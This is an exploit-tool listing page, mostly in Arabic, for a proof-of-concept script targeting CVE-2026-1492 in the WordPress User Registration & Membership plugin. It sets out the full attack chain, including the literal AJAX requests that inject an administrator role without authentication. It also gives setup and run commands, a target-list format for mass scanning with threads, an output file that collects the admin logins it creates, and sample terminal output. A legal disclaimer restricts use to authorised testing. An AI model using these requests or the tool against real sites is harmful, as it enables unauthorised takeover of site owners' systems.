Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-1492 — User Registration & Membership <= 5.1.2 - تصعيد امتيازات بدون مصادقة عبر تسجيل العضوية | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2026-1492
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubnxploited/cve-2026-1492

CVE-2026-1492

User Registration & Membership <= 5.1.2 - تصعيد امتيازات بدون مصادقة عبر تسجيل العضوية

عرض المستودع
2منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-1492

User Registration & Membership <= 5.1.2 - تصعيد الامتيازات دون مصادقة عبر تسجيل العضوية

Typing SVG


🔴 نظرة عامة على الثغرة

CVE-2026-1492 — تصعيد الامتيازات دون مصادقة عبر تسجيل العضوية

الوصف:
إضافة User Registration & Membership الخاصة بـ WordPress معرّضة لثغرة تصعيد الامتيازات دون مصادقة في جميع الإصدارات حتى 5.1.2 وما يشملها. يعود سبب الثغرة إلى معالج AJAX user_registration_membership_register_member الذي يقبل قيمة role مقدَّمة من المستخدم أثناء عملية تسجيل العضوية دون فرض أي قائمة سماح على الخادم أو فحص صلاحيات. يمكن لمهاجم بعيد غير مصادَق تمامًا أن يصوغ سلسلة طلبات AJAX متعددة الخطوات — تبدأ بتسجيل حساب مستخدم جديد، ثم إرسال استدعاء register_member خبيث مع حقن "role": "administrator" داخل حمولة JSON الخاصة بـ members_data — لإنشاء حساب Administrator (مسؤول) في WordPress بصلاحيات كاملة وبصمت تام. يؤدي ذلك إلى اختراق كامل لتثبيت WordPress المتأثر دون الحاجة إلى أي تفاعل من المستخدم.


🛠️ وصف الأداة

هذا سكربت استغلال إثبات المفهوم (PoC) ينفّذ سلسلة هجوم كاملة مدركة للحالة ضد مواقع WordPress التي تشغّل إصدارًا معرّضًا من إضافة User Registration & Membership. تنفّذ الأداة استغلالًا ذكيًا متعدد المراحل يشمل الاكتشاف التلقائي، واستخراج خطط العضوية، وجمع الـ nonce، والتسجيل ثنائي التدفق، وحقن الدور، والتحقق من المسؤول.

🔗 سلسلة الهجوم الكاملة

root@kitploit:~
[Discovery Phase]
  GET /membership-pricing/  →  Extract membership plan IDs
  GET /registration/        →  Extract form fields, nonces, AJAX params

        ↓

[Registration Phase — Flow A]
  POST /wp-admin/admin-ajax.php
  action=user_registration_user_form_submit
  → Register new user account

        ↓

[Role Injection Phase — Flow A]
  POST /wp-admin/admin-ajax.php
  action=user_registration_membership_register_member
  members_data={"role":"administrator", "membership":"<id>", ...}
  → Inject administrator role into newly created account

        ↓

[Admin Verification Phase]
  GET /wp-admin/  →  Check for admin dashboard indicators
  GET /wp-admin/plugin-install.php  →  Confirm plugin-install access

        ↓

[Fallback Override — Flow B]
  If Flow A admin check fails → repeat with fresh username/email

        ↓

[Write to Nx_admin.txt]
  Format: https://target.com/wp-login.php user:<u> pass:<p>

📋 المتطلبات

متطلبات النظام

  • بايثون 3.8 أو أحدث
  • Linux / Windows / macOS

تبعيات بايثون

root@kitploit:~
pip install requests urllib3 rich

أو عبر ملف المتطلبات:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

🚀 التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-1492.git
cd CVE-2026-1492

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-1492.py

⚙️ الاستخدام

التشغيل الأساسي

root@kitploit:~
python3 CVE-2026-1492.py

تستخدم الأداة واجهة طرفية تفاعلية بالكامل مدعومة بمكتبة Rich، وتُطلب جميع المعاملات في وقت التشغيل.


🗂️ تنسيق قائمة الأهداف

أنشئ ملفًا نصيًا بسيطًا (الافتراضي: list.txt) بحيث يحتوي كل سطر على هدف واحد:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

🖥️ المطالبات التفاعلية

root@kitploit:~
Targets file [list.txt]: list.txt

Credentials:
  - Username prefix: random number is added per site (fresh user per target/plan/flow)
  - Email: if left empty, it will be built from the username automatically
  - Password: fixed for all sites

Username prefix (optional): Nxploited
Email (optional): 
Password [Nx_12999]: Nx_12999
Threads [3]: 5
HTTP timeout (seconds) [10]: 10

🔬 شرح معمّق للاستغلال

الخطوة 1 — الاكتشاف

تكتشف الأداة وتحلّل تلقائيًا:

الخطوة 2 — طلب تسجيل AJAX

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_user_form_submit
&form_data=[{"field_name":"user_login","value":"Nxploited_A_482910",...}]
&form_id=1
&ur_frontend_form_nonce=<extracted_nonce>
&security=<extracted_security>
&is_membership_active=<membership_id>

الخطوة 3 — حقن الدور عبر AJAX (الاستدعاء المعرّض للثغرة)

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_membership_register_member
&members_data={"membership":"<id>","payment_method":"free","role":"administrator","username":"Nxploited_A_482910",...}
&form_response={...}
&_wpnonce=<membership_nonce>
&security=<membership_nonce>

⚠️ يقبل الخادم حقل role من العميل دون أي تحقق من قائمة السماح — وهذا هو السبب الجذري لثغرة CVE-2026-1492.

الخطوة 4 — التحقق من حساب المسؤول

تفتح الأداة جلسة جديدة، وتسجّل الدخول باستخدام بيانات الاعتماد المنشأة حديثًا، ثم تفحص:


📁 ملفات الإخراج

��� تنسيق إخراج المسؤول

root@kitploit:~
https://target.com/wp-login.php user:Nxploited_A_482910|pass:Nx_12999

🖥️ نموذج مخرجات الطرفية

root@kitploit:~
╔══════════════════════════════════════════════════════════════════════╗
║   CVE-2026-1492  |  User Registration & Membership — Admin PoC      ║
║   By: Nxploited  |  GitHub: github.com/Nxploited  |  @KNxploited    ║
╚══════════════════════════════════════════════════════════════════════╝

[INFO]   https://target.com
[OK]     https://target.com  |  REG-A-OK  user:Nxploited_A_482910 mem:3
[OK]     https://target.com  |  MEM-A-OK  membership A (role=administrator payload) sent
[OK]     https://target.com  |  ADMIN-A   user:Nxploited_A_482910 pass:Nx_12999 mem:3

┌─────────────────────────────��───────────────────────────────────────────────┐
│  Target                  │  Status           │  Note                        │
├─────────────────────────────────────────────────────────────────────────────┤
│  https://target.com      │  ✅ ADMIN-A       │  user:Nxploited_A_482910 ... │
│  https://target2.com     │  MEM-B-FAIL       │  membership not configured   │
│  https://target3.com     │  DEAD             │  connection error            │
└─────────────────────────────────────────────────────────────────────────────┘

📊 مرجع رموز الحالة


📡 التواصل والمؤلف

بواسطة: Nxploited (Khaled Alenazi)

 


⚠️ إخلاء المسؤولية القانونية

تُقدَّم هذه الأداة لأغراض التعليم والبحث الأمني المصرح به فقط.

المؤلف، Nxploited (Khaled Alenazi)، وجميع المساهمين في هذا المشروع لا يتغاضون عن إساءة استخدام هذه الأداة، ولا يدعمونها، ولا يتحملون أي مسؤولية عن أي ضرر ناتج عن استخدام هذا البرنامج ضد أنظمة لا تملكون إذنًا كتابيًا صريحًا لاختبارها.

  • ✅ مسموح: الاستخدام على الأنظمة التي تملكونها أو التي مُنحتم إذنًا كتابيًا صريحًا لاختبارها.
  • ❌ محظور: الاستخدام ضد أي أنظمة دون الحصول على إذن كتابي صريح مسبق من مالك النظام.

الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني ويعاقَب عليه بموجب القوانين المعمول بها، بما في ذلك على سبيل المثال لا الحصر قانون Computer Fraud and Abuse Act (CFAA) وقانون Computer Misuse Act (CMA) والتشريعات المماثلة في جميع أنحاء العالم.

باستخدام هذه الأداة، فإنكم تقبلون المسؤولية الكاملة والحصرية عن أفعالكم وتؤكدون أن لديكم السلطة القانونية لاختبار الأنظمة المستهدفة.

لا يتحمل المؤلف أي مسؤولية مهما كانت عن أي أضرار مباشرة أو غير مباشرة أو عرضية أو تبعية تنشأ عن استخدام هذا البرنامج أو إساءة استخدامه.


© 2026 Nxploited (Khaled Alenazi) — لأغراض البحث الأمني المصرح به فقط.

تنزيل الأداة
الحقلالتفاصيل
معرّف CVECVE-2026-1492
الخطورةحرجة — درجة CVSS v3.1: 9.8
ناقل الهجومCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
البرمجيات المتأثرةUser Registration & Membership — مُنشئ نماذج التسجيل المخصصة، ونموذج تسجيل الدخول المخصص، وملف المستخدم، وإضافة تقييد المحتوى والعضوية لـ WordPress
الإصدارات المتأثرةجميع الإصدارات حتى 5.1.2 وما يشملها
نوع الثغرةإدارة امتيازات غير سليمة — إنشاء حساب مسؤول دون مصادقة
المصادقةغير مطلوبة
CWECWE-269: إدارة امتيازات غير سليمة
الهدفالبيانات المستخرجة
/membership-pricing/معرّفات خطط العضوية، وروابط صفحة التسجيل
/registration/حقول النموذج، ورموز nonce، وروابط AJAX، ومدخلات الراديو الخاصة بالعضوية
كائن JS user_registration_paramsajax_url، وnonce security، والبيانات الوصفية للنموذج
ur_membership_frontend_localized_datanonce خاص بالعضوية، ونقطة نهاية AJAX
نقطة النهايةالمؤشر المُفحَص
/wp-admin/adminmenu, wp-admin-bar, manage_options
/wp-admin/users.phpusers.php
/wp-admin/plugin-install.phpupload-plugin, plugin-install-tab
الملفالوصف
Nx_admin.txt✅ حسابات المسؤول المؤكدة
membership_success_log.txtجميع استدعاءات حقن دور العضوية الناجحة
discovery_log.txtبيانات الاكتشاف الكاملة لكل هدف (nonces، معرّفات، حقول)
registration_log.txtجميع طلبات واستجابات تسجيل AJAX
membership_log.txtجميع طلبات واستجابات عضوية AJAX
admin_check_log.txtمحاولات تسجيل الدخول ونتائج التحقق من المسؤول
الحالةاللونالمعنى
ADMIN-A / ADMIN-B🟢 أخضرتم تأكيد المسؤول — التدفق A أو B
ADMIN-A-OVERRIDE🟢 أخضرتم تأكيد المسؤول بعد محاولة التجاوز
REG-A-FAIL / REG-B-FAIL🟡 أصفرفشل استدعاء تسجيل AJAX
MEM-A-FAIL / MEM-B-FAIL🟣 أرجوانيفشل استدعاء حقن دور العضوية
REG-PENDING-A/B⚫ داكنالحساب يتطلب التحقق من البريد الإلكتروني أو موافقة المسؤول
NO-MEM-ID⚫ داكنلم يتم العثور على معرّف خطة العضوية على الهدف
NO-UR-NONCE⚫ داكنnonce التسجيل غير قابل للاستخراج
NO-ADMIN⚫ داكنالعضوية ناجحة لكن وصول المسؤول غير مؤكد
TIMEOUT⚫ داكنانتهاء مهلة HTTP
DEAD⚫ داكنخطأ اتصال — الموقع غير قابل للوصول
ERROR🔴 أحمراستثناء غير متوقع